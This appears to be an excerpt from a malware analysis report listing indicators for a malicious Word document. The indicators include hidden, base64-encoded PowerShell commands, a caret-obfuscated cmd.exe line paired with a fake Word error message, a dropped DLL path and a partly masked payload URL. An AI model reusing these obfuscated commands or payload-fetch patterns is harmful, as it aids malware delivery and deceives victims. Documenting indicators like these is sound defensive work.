Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD cwBFAHQALQBpAFQARQBtACAAIAB2AEEAcgBpAEEAQgBMAGUAOgB0AFEANAB1AE8AbAAgACAAKAAgAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADMAfQB7ADEAfQB7ADIAfQAiAC0ARgAgACcAUwB5ACcALAAnAGQA...
- %HOMEPATH%\e815zku\wydfrkw\r31x.dll
- http://zh#####ixingchuang.com/wp-admin/N2X3/
- DNS ASK zh#####ixingchuang.com
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD cwBFAHQALQBpAFQARQBtACAAIAB2AEEAcgBpAEEAQgBMAGUAOgB0AFEAN...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.